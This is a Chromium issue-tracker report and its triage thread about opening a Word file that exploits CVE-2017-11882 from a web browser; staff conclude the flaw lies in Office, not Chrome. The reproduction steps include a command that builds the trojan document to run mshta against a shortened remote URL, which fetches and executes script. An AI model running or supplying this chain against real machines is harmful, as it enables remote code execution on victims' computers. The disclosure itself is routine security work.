Security: Upload file Exploit and run Script file
Reported by
sitthipo...@gmail.com,
Dec 2 2017
Issue description

DETAILS
Upload file Microsoft Word (Exploit CVE-2017-11882) to web site for Web browser and run script Exploit

VERSION
Chrome Version: [62.0.3202.94] + [stable]
Operating System: [Windows 10 Pro OS, version 1607 for x64-based Systems (KB4051033) (turn off Windows Defender)]

REPRODUCTION CASE
1. Upload file Exploit.html and file calc.exe to web site
   Ex: https://stp5940pentester.000webhostapp.com/Exploit.html
2. Short url for https://goo.gl
   Ex: https://stp5940pentester.000webhostapp.com/Exploit.html to https://goo.gl/FjZRtY
3. Open cmd Run file Command109b_CVE-2017-11882.py
   Ex: Command109b_CVE-2017-11882.py -c "cmd.exe /c mshta https://goo.gl/FjZRtY" -o Hello.doc
4. Upload file to https://www.virustotal.com

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [ Run script Exploit ]
Demo: https://youtu.be/ar0LMC_Ig2w
Crash State:
Google Chrome Version 62.0.3202.94 : Success
Mozilla Firefox Version 57.0.1 : Success
Opera Version 49.0.2725.47 : Success
Microsoft Edge : unsuccessful
Dec 3 2017
Use as you say. Who should I report this problem to?
Dec 3 2017
Thank you for providing more feedback. Adding requester "elawrence@chromium.org" to the cc list and removing "Needs-Feedback" label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Dec 3 2017
elawrence: do you know if this is a known issue in Microsoft Office then?
Dec 3 2017
My assumption based on the text above is that the Windows shell previewer is also vulnerable to CVE-2017-11882 and that patch resolves the issue. But I do not know.
Dec 3 2017
But it sounds like, in any case, this is not a bug in Chrome. Is that right?
Dec 4 2017
Original Reporter: If you install Microsoft's patch for CVE-2017-11882, does this issue continue to reproduce? Do you see the same behavior if you click File > Open inside another application (e.g. Notepad) and select the trojan document?
Dec 4 2017
RE #6: Correct, I'm almost positive that this isn't a bug in Chrome and is instead a bug in the Office previewer dll. If the reporter replies to #7 and notes that it's still reproducing after installing the Office patch, we should work together to disclose to secure@microsoft.com
Dec 5 2017
This is not an issue in Chrome. Original Reporter, please see #7. If you can reproduce this with the patch from Microsoft installed, please let me know and I'll help further.
Mar 14 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by elawrence@chromium.org, Dec 3 2017